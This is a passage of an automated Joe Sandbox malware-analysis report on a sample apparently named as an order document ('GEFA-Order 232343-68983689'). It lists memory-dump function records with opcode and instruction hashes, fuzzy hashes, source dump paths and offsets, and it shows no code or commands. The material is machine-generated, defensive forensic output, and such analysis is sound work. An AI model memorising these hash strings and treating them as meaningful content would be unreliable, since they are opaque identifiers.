                                          • Opcode Fuzzy Hash: ec88490e8f07c1377b1762890568921c532f3b206919b30e2bf5ed3a6aeb4cc7
                                          • Instruction Fuzzy Hash: B7D05E35106344AFC3019E20D809CC33F6ADF9752030282EAF5408B622DA32981486A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction ID: 4ee87a717103125dc0d99b12090306f84b3cb6c1904581f1230d5b0d96716c8d
                                          • Opcode Fuzzy Hash: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction Fuzzy Hash: 4FE0C234908208EFC704DFA4D4515BCBFB8EB89300F20C09DE8091B340DB319E02DB86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction ID: 5689b947eae9c6faa437a6b39f292009365fab33525187b881f9211ac5d2804d
                                          • Opcode Fuzzy Hash: c4ae26c2213731d26a3829e9a4fd35469e6c2e0135c1cb8743ad897a306d130c
                                          • Instruction Fuzzy Hash: 44E0C234D08208EFC704DFA4D4455BCBBB4EB89300F20C0AAD80817340DB319E02EF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b60c6cad9db9655145847a23de584de05a7f9c2434b58d92e4015a9d653ae3fc
                                          • Instruction ID: 39ff643e908ee2862b23ad42e5891de200adea5be267686a21e3d338fda08b6b
                                          • Opcode Fuzzy Hash: b60c6cad9db9655145847a23de584de05a7f9c2434b58d92e4015a9d653ae3fc
                                          • Instruction Fuzzy Hash: 55E01271941208EBCB40EFB8C80969E7BF9DB49300F1144A69909A7250EE314A04AB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bda9f4e6d3675de95e97c864628eee1a9e9401bdea1b76b57357e1c5c8e641c4
                                          • Instruction ID: 44f40f07d04f11d9fefdbe0ddb380119e2c2e147fb8dbe176e6e85983f2fefcb
                                          • Opcode Fuzzy Hash: bda9f4e6d3675de95e97c864628eee1a9e9401bdea1b76b57357e1c5c8e641c4
                                          • Instruction Fuzzy Hash: 50E0C274908208EFC704DFA8D8415BCBBB8EB89300F20C099D80927380DB715E82DBD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c59cf023c918269d95fd5f859d3c84d6272f24dfb8bd14e0305e6f6e3c7a8f
                                          • Instruction ID: 182bc2a76788b117647177851c2a7b48d4cddde124caa2ab50b0538538bbf682
                                          • Opcode Fuzzy Hash: d7c59cf023c918269d95fd5f859d3c84d6272f24dfb8bd14e0305e6f6e3c7a8f
                                          • Instruction Fuzzy Hash: 73E0EC35909218EBC744EFA5D5519ACBFB9EB4A314F20C1A9980817341CA315E46DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e48c12cda983ecb0d64737f6c273c5f2c391d22a3a92e58743a65f367e5cfcba
                                          • Instruction ID: 09c5f1ffa8971849d420183b2d38a9fe82cdc10b05bf989ca46f5b93784f8759
                                          • Opcode Fuzzy Hash: e48c12cda983ecb0d64737f6c273c5f2c391d22a3a92e58743a65f367e5cfcba
                                          • Instruction Fuzzy Hash: EFD0C731750528574B54A5ED75004AA77CDCBC91657188466DA0DC3744E925DC0187D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bedd4b0c7fd91d42fb1599c1ddcbf59e448ca48c752403d54709685d17ebbfb4
                                          • Instruction ID: 6a473cf5503f6febdf6248fe734f302e4fafecadff14388e5dea115753f093c7
                                          • Opcode Fuzzy Hash: bedd4b0c7fd91d42fb1599c1ddcbf59e448ca48c752403d54709685d17ebbfb4
                                          • Instruction Fuzzy Hash: 7AE0EC34949208EBCB44DFA5D5415ACBBF5EB49314F20C199980817341CA329E46DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5004b1a86555c9ca6020f119346938254b9ef895de92e9365657f541978e3bdb
                                          • Instruction ID: 32c3bb0a9fec1e7c11d38098d4cdc4363e9a3f31f8f88ad8ad824d0351d4f763
                                          • Opcode Fuzzy Hash: 5004b1a86555c9ca6020f119346938254b9ef895de92e9365657f541978e3bdb
                                          • Instruction Fuzzy Hash: E3E01771D8120CEBC781FFB8C9096AE7BF9DB09301F1184AA950D97250EE314E04ABA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb2fbc41a9d01d8c24369b7fca0d0f22c85d34398da89f6627fbecef4235b637
                                          • Instruction ID: c258b81ade78804220e1b8f6a9e66501481ea5e19085840c280df701fdcc0692
                                          • Opcode Fuzzy Hash: bb2fbc41a9d01d8c24369b7fca0d0f22c85d34398da89f6627fbecef4235b637
                                          • Instruction Fuzzy Hash: 31E0EC74D55308EFC780DFBCE4556ACBBB4AB0C301F6040A9D808E3341E7305A44DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 822c8774ec773755fd807d93a8c23864860939ddbe9a73bac4a69065a4599358
                                          • Instruction ID: bca83075a5a1e6611ab07cb40082ba623bc7a48839c2b01562a5df5170f84c6b
                                          • Opcode Fuzzy Hash: 822c8774ec773755fd807d93a8c23864860939ddbe9a73bac4a69065a4599358
                                          • Instruction Fuzzy Hash: 10E0EC70D15218EFCB80EFB8D4452ACBBB5AB08305F5080AAA90993340E6705A44DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d1c8db678737592a2d45cc0bc1725f89b03447f9399cd06733a5e6b273e030f
                                          • Instruction ID: 99331ff1025aa44b4f957ffa669ed3eb85a98aebed79085db464dbd142d4d2dc
                                          • Opcode Fuzzy Hash: 2d1c8db678737592a2d45cc0bc1725f89b03447f9399cd06733a5e6b273e030f
                                          • Instruction Fuzzy Hash: 99E01270A01308EFCB40DFB8E95166DB7BAEB94305F118599D909DB340E972AF00AB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8a2c44776851075f8c323507fb61730ffba463ddaed10de5111859b1342ba54
                                          • Instruction ID: ab43357f2b646ba3cc4f332a0f606ca533dd5dfba65d52b7deb9bed1b98f3a68
                                          • Opcode Fuzzy Hash: a8a2c44776851075f8c323507fb61730ffba463ddaed10de5111859b1342ba54
                                          • Instruction Fuzzy Hash: 33D01771C5A208EBC704DFB4E5056BDBBB9AB4A351F1081A9980967340CA301A45DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15a6099dd48f933201b71ffef6bb9ee2309b483ef38f0773743c25bb56ecad7e
                                          • Instruction ID: c7d475273747f131576a671625e45af1527b33383156ec65cf04a7bdf6fc6727
                                          • Opcode Fuzzy Hash: 15a6099dd48f933201b71ffef6bb9ee2309b483ef38f0773743c25bb56ecad7e
                                          • Instruction Fuzzy Hash: 25D0A730519208EFC744DBA6D411AB8B7BCDB4A314F10C09D9C0C5B341DA339D01DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ebc77d43cce35f60550dc3d16bb48543799d932fe1e08f3a6a33c39e003b590
                                          • Instruction ID: 16c6286e87b907529eb2d83db1de6c6c609eb6942e42ced9c2a59aa16b52fbc1
                                          • Opcode Fuzzy Hash: 5ebc77d43cce35f60550dc3d16bb48543799d932fe1e08f3a6a33c39e003b590
                                          • Instruction Fuzzy Hash: DBD0A931B046620F8B61D33DBC0498B7BDA8FCC6123084A69B08AE3708EE60DD0287E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb91a5630302184ae4289c7fcc2291198863d3455e68eaea1037a9e679e1927d
                                          • Instruction ID: 8c4022bffc7d3a190528c8ab3d491275ebc5442cd4fab831fbf463481a7188ba
                                          • Opcode Fuzzy Hash: fb91a5630302184ae4289c7fcc2291198863d3455e68eaea1037a9e679e1927d
                                          • Instruction Fuzzy Hash: D1D013317001185747D4555DA51055977CDCFC9151715C1559E4FD7344DD61DC0347D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2defef6125de67a715c4150043c0b538348092558dfcfec7dbf9b3b59f5764a1
                                          • Instruction ID: 03f2a58e8439444c1b86ca5cc412b7ae70b6d4a2999f42dec8341ddc9c69c918
                                          • Opcode Fuzzy Hash: 2defef6125de67a715c4150043c0b538348092558dfcfec7dbf9b3b59f5764a1
                                          • Instruction Fuzzy Hash: 4BE01770A0130DEFCB40EFA8E94069DB7FAEB84302F1085A9D909D7700EA316F049B92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48421f67f59630331537e4b886a81fc08caf984e13e2ec94f7bbcc3a3014dc6f
                                          • Instruction ID: 3496f83f35cc53c33b8ca8e038e74a643e3a77540cd8b072d821cab3e8d6432d
                                          • Opcode Fuzzy Hash: 48421f67f59630331537e4b886a81fc08caf984e13e2ec94f7bbcc3a3014dc6f
                                          • Instruction Fuzzy Hash: FFD022334C87886FC7020EA0AC008827FB9BB6230030340A3F0408F013C6235A02C7FA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66f1464e66561c30ef921432389b1322810da2d103ca403e3841a34ed346de34
                                          • Instruction ID: c1c237400a3ba668cedec52e9ad57f146bc6650a0968a77dac23bb4cc930a520
                                          • Opcode Fuzzy Hash: 66f1464e66561c30ef921432389b1322810da2d103ca403e3841a34ed346de34
                                          • Instruction Fuzzy Hash: 3BD0A73C0062405FC3468600DD50C82FB249F92304314C08AE4484F153C6238E17DB71
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cef8112317127a605197122b6af822aa9a66dd2289077affb5654bd8763cea71
                                          • Instruction ID: 3bf2eaa2d86e86f2445dca1d8c3798f4576ad443e23346e2873b262f1d9fb24d
                                          • Opcode Fuzzy Hash: cef8112317127a605197122b6af822aa9a66dd2289077affb5654bd8763cea71
                                          • Instruction Fuzzy Hash: 56D0A732505409E68B509BF4C948898B3A4BEF13143481152811C51810DF21D934E2C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e1e5fdb9dc71fdb647c9b22ef499041c6f9993b1d2ed102d887ad9977164d25
                                          • Instruction ID: c4df2e4c201cd0a3c25eb66a4756ba7f7ccc37d2ef49f9162f9ed703ba671249
                                          • Opcode Fuzzy Hash: 0e1e5fdb9dc71fdb647c9b22ef499041c6f9993b1d2ed102d887ad9977164d25
                                          • Instruction Fuzzy Hash: BEE01A70A001298FCB94EF54D898B9DB7B2EBA5301F10809A950AA7350CA341E898FA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8dc484d82b8e31bc1d44eee2c2020ebe505dd0813addb662aa1006d24c6a0ffd
                                          • Instruction ID: a5c4319120c75d012295655c4b1b958ee74178d2d91f0a209ef42f21a3fbec5f
                                          • Opcode Fuzzy Hash: 8dc484d82b8e31bc1d44eee2c2020ebe505dd0813addb662aa1006d24c6a0ffd
                                          • Instruction Fuzzy Hash: 81E01234600224CFC794DF24E89879DB772FBC5301F108496C909A7390CB345D89CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5967751821ef5f0d090b060b20a42bb420429bf8aabfa55db7624d0fe38be8ea
                                          • Instruction ID: e762bcf96596d4fe8db3c0131da64442ca3fb156d5ed43876de11380c9058f47
                                          • Opcode Fuzzy Hash: 5967751821ef5f0d090b060b20a42bb420429bf8aabfa55db7624d0fe38be8ea
                                          • Instruction Fuzzy Hash: 3DE01270A40216CFCB14DF54D8987BE7772FB94341F0044A5C90AA7B40EB341D449F41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 983343e977fe595e607118e5d46035455ab1dc5c78430cc01eaabb047343b499
                                          • Instruction ID: 18c3465c6e52d1b646541943548de5e1d95cb98ba24b4e0093657e2dae0044c3
                                          • Opcode Fuzzy Hash: 983343e977fe595e607118e5d46035455ab1dc5c78430cc01eaabb047343b499
                                          • Instruction Fuzzy Hash: DAE01270E00259CFD750DF54E898799B772EB98301F10809AC50AFB340CB341E44CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0af02f3436e520d93a2c1917bae0a9e87e7de993867a6e3e178e8b54aa2804ca
                                          • Instruction ID: d2f42abf02f9186f053c9346edb2de148ca71e2d66e01f1c2445e23ff323970b
                                          • Opcode Fuzzy Hash: 0af02f3436e520d93a2c1917bae0a9e87e7de993867a6e3e178e8b54aa2804ca
                                          • Instruction Fuzzy Hash: 71E09A34A052298FCB54EF54D598B9DB772FB95341F10409AD50AA7380DB345F44CFA3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6880b15ffb7a2d520784b7284833597bb432b689e6b853e1cf40d759134a985
                                          • Instruction ID: e106b51956173315309a7f580aab512a019bd395955e252b436b41261c471a1a
                                          • Opcode Fuzzy Hash: e6880b15ffb7a2d520784b7284833597bb432b689e6b853e1cf40d759134a985
                                          • Instruction Fuzzy Hash: F1E09A74A05265CFCB94EF14D8987AEB772FB98341F104099D50AA7394CB345E84CF62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7970af86fd25cd29be925567a553df4c0405ece8b92a7c09e2e5f6a75f7a2f8e
                                          • Instruction ID: 1e3acbeb768a97db7a78957ce10d2659517d06ee9a7f80864a90a2cd4395c22d
                                          • Opcode Fuzzy Hash: 7970af86fd25cd29be925567a553df4c0405ece8b92a7c09e2e5f6a75f7a2f8e
                                          • Instruction Fuzzy Hash: F9E01270A01128CBDB10DF14E899B99B772FB89301F0041D5C60DE7380C7341D448F61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d54de57fea0a5027bd5bbf4f859c27dfbd52a9b1ad5b1a19d0def476e0719c28
                                          • Instruction ID: d6d4c36c8128167f252db9a9c8890a9541eb88e5990f4e965080408905c334a3
                                          • Opcode Fuzzy Hash: d54de57fea0a5027bd5bbf4f859c27dfbd52a9b1ad5b1a19d0def476e0719c28
                                          • Instruction Fuzzy Hash: 8AE0E574E00218CFDB50DF18D848BD9BBB1FB48300F1081A69848A3300DB344E81CFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0a3c17bf572b85f4702c76c93eeaa7c37579ec256e4eb7638042a1644274058
                                          • Instruction ID: 652dd9d78c52260583f5b86ad9c7e2606b3fd04df5bf9770ca828be78ef8ff78
                                          • Opcode Fuzzy Hash: a0a3c17bf572b85f4702c76c93eeaa7c37579ec256e4eb7638042a1644274058
                                          • Instruction Fuzzy Hash: 3BC04C7454A3913FDB621660AC1AFD33F2A17C2B00F154796F241D95D295CA15458272
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fc4f39cfec3b4712f03d9211ec95059a436cdd65e8f0da44efd7c4568ca8394
                                          • Instruction ID: efd2fceb303a29c6415620e92516d1325df61323219096f228a21d598e635380
                                          • Opcode Fuzzy Hash: 7fc4f39cfec3b4712f03d9211ec95059a436cdd65e8f0da44efd7c4568ca8394
                                          • Instruction Fuzzy Hash: 5FE0B670859368CFDB90DB24DC48BAA7BB5BB5138AF50A695900DA6160CFB81AC4CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3ba35a17bfb1a43a25b9cb25431b061c0e72900b465f3aa783a5d54a45137c8
                                          • Instruction ID: 76730ea74cce9dced1bd6d781eea48eebcc6f95f256c39e47c4ea578a9e4eb6b
                                          • Opcode Fuzzy Hash: e3ba35a17bfb1a43a25b9cb25431b061c0e72900b465f3aa783a5d54a45137c8
                                          • Instruction Fuzzy Hash: 01D012B0A14328CFDB40DB34EC0866977B6AB84345F108658D40E67245CB784D858F84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f224e9251c6fbfdb304ae7a64c89a4df1e627e58dcc67003ebd8eef0a585e34
                                          • Instruction ID: 76730ea74cce9dced1bd6d781eea48eebcc6f95f256c39e47c4ea578a9e4eb6b
                                          • Opcode Fuzzy Hash: 3f224e9251c6fbfdb304ae7a64c89a4df1e627e58dcc67003ebd8eef0a585e34
                                          • Instruction Fuzzy Hash: 01D012B0A14328CFDB40DB34EC0866977B6AB84345F108658D40E67245CB784D858F84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f08b1998b31e980318fee49f1bea87d2317ebcaa5a517220d7b107f28b1e87c
                                          • Instruction ID: 9628a48bb0b0572d81598b566f34f603db72745a3fc3b15e01ff190717f348ea
                                          • Opcode Fuzzy Hash: 4f08b1998b31e980318fee49f1bea87d2317ebcaa5a517220d7b107f28b1e87c
                                          • Instruction Fuzzy Hash: 99C02BB10EAF04CAC1041AB4B81D372BFACC30F301F485800710C210908B610010EBB5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd1248ba52b3bcd6b18df95604578d62e1f21a067b0c70820fdf106fe63632c2
                                          • Instruction ID: 157b661c3900a99eb8ea430a619ff2272e65ecebf12323a57a995ff5c6592125
                                          • Opcode Fuzzy Hash: fd1248ba52b3bcd6b18df95604578d62e1f21a067b0c70820fdf106fe63632c2
                                          • Instruction Fuzzy Hash: C6C08C4152F3E00BDB8362210C244921F6049E621038613DBD4C68A043408A0614C333
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1308fdc96255885f4f9a93954e928159a3c81cfc436b2e07019dfb9723e249ef
                                          • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                          • Opcode Fuzzy Hash: 1308fdc96255885f4f9a93954e928159a3c81cfc436b2e07019dfb9723e249ef
                                          • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14019dde54c0f0b78cf1220dc08fed23e492dfbaceb7e07849c50027de14ade8
                                          • Instruction ID: 76f41bf434cd662a4bbda170205ac1576ef263c4c77d33eb8199969b631e9e8d
                                          • Opcode Fuzzy Hash: 14019dde54c0f0b78cf1220dc08fed23e492dfbaceb7e07849c50027de14ade8
